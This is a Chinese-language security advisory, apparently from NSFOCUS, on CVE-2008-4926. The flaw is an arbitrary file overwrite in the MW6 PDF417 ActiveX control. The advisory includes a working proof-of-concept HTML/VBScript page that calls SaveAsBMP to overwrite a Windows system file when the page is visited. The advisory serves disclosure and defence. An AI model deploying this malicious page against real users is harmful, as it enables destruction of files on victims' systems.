安全研究

安全漏洞
MW6 PDF417.dll ActiveX控件任意文件覆盖漏洞

发布日期:2008-10-29
更新日期:2008-10-30

受影响系统:
MW6 Technologies PDF417 ActiveX 3.0.0.1
描述:
BUGTRAQ  ID: 31983
CVE(CAN) ID: CVE-2008-4926

PDF417 ActiveX是用于处理PDF417二维码的ActiveX控件。

PDF417 ActiveX没有正确地过滤对SaveAsBMP()和SaveAsWMF()方式所传送的输入参数:

Sub SaveAsWMF (
    ByVal FileName  As String
)

Sub SaveAsWMF (
    ByVal FileName  As String
)

如果用户受骗访问了恶意网页并向上述方式传送了超长的FileName参数的话,就可能导致覆盖系统上的任意文件。

<*来源:Dr.Pantagon
  
  链接:http://www.milw0rm.com/exploits/6873
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<html>
Test Exploit page
<object classid='clsid:90D2A875-5024-4CCD-80AA-C8A353DB2B45' id='target' >
    <param name="BackColor" value="16777215">
    <param name="BarColor" value="0">
    <param name="BorderStyle" value="0">
    <param name="Data" value="12">
    <param name="ModuleWidth" value="0,07">
    <param name="Orientation" value="0">
    <param name="SecurityLevel" value="2">
    <param name="PDFMode" value="0">
    <param name="PDFColumns" value="3">
    <param name="PDFRows" value="0">
    <param name="TruncateSymbol" value="0">
    <param name="HandleTilde" value="0">
    <param name="Y2XRatio" value="3">
</object>
<script language='vbscript'>
targetFile = "C:\WINDOWS\system32\MW6PDF417.dll"
prototype  = "Sub SaveAsBMP ( ByVal FileName As String )"
memberName = "SaveAsBMP"
progid     = "MW6PDF417Lib.PDF417"
argCount   = 1

arg1="c:\windows\system_.ini"

target.SaveAsBMP arg1
'target.SaveAsWMF arg1

</script>

建议:
厂商补丁:

MW6 Technologies
----------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.mw6tech.com/

浏览次数:2333
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障